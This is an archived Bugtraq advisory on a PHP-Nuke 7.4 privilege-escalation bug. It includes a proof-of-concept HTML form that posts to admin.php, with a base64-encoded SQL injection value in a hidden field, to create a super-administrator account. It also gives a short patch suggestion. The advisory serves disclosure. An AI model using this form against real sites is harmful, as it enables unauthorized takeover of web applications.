[XSS] PHP-Nuke 7.4 Remote Privilege Escalation

From: Pierquinto Manco (mantra_at_ntj.it)
Date: 09/03/04

Next message: fabio: "Dynalink routers backdoor?"

Previous message: Sune Kloppenborg Jeppesen: "UPDATE: [ GLSA 200408-22 ] Mozilla, Firefox, Thunderbird, Galeon, Epiphany: New releases fix vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 3 Sep 2004 12:50:59 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)

**************************************************************
* CODEBUG Labs
* Advisory #1
* Title: AddAdmin Bug
* Author: Pierquinto 'Mantra' Manco
* Product: PHP-Nuke 7.4
* Type: XSS
* Web: http://www.mantralab.org [ITALIAN SITE]
*
**************************************************************

Remote Privilege Escalation

- ) Description
PHP-Nuke is a very bugged web CMS, version 7.4 has critical
XSS bug that permit to an attacker to gain Admin access
to the system.
The bug is very old but we can bypass the patch sending data
by POST instead of GET.

- ) Proof-of-Concept
Create a HTML file with this lines:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
  <p>USERNAME:
    <input type="text" name="add_aid">
    <br>
    NOME:
    <input type="text" name="add_name">
    <br>
    PASSWORD:
    <input type="text" name="add_pwd">
    <br>
    E-MAIL:
    <input type="text" name="add_email">
    <br>
    <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
    <br>
    <input type="hidden" name="add_radminsuper" value="1">
    <br>
    <input type="hidden" name="op" value="AddAuthor">
  </p>
  <p>
    <input type="submit" name="Submit" value="Create Admin">
    <br>
  </p>
</form>

- ) Patch

Put in admin.php a routine to check GET and POST global array.
(maybe COOKIE too)

**************************************************************
http://www.mantralab.org
admin@mantralab.org
**************************************************************

Next message: fabio: "Dynalink routers backdoor?"

Previous message: Sune Kloppenborg Jeppesen: "UPDATE: [ GLSA 200408-22 ] Mozilla, Firefox, Thunderbird, Galeon, Epiphany: New releases fix vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[XSS] PHP-Nuke 7.4 DelAdmin Bug
... Title: DelAdmin Bug ... Type: XSS ... PHP-Nuke is a very bugged web CMS, ... This bug is very old too but we can bypass the patch sending data ...
(Bugtraq)
[XSS] PHP-Nuke 7.4 ViewAdmin Bug
... Title: ViewAdmin Bug ... Type: XSS ... PHP-Nuke is a very bugged web CMS, ... This bug is very old too but we can bypass the patch sending data ...
(Bugtraq)
My Datebook SQL Injection + XSS
... Bug: SQL Injection + XSS ... Fix Available: No ... The File diary.php is subject to several SQL Injections. ...
(Bugtraq)
phpTrafficA < 1.4.2
... Bug: injection sql, xss, full path ... "phpTrafficA is a GPL statistical tool for web traffic analysis, ...
(Bugtraq)
[PersianHacker.NET 200503-09]PHPOpenChat v3.x XSS Multiple Vulnerability
... is a high performance php-based chat server software for a live chat-room or -module on every php-based site. ... PHPOpenChat v3.x XSS Exploit ... by Pi3cH (pi3ch persianhacker net) ... This vulnerability reported to authors for solution, from bug report webform. ...
(Bugtraq)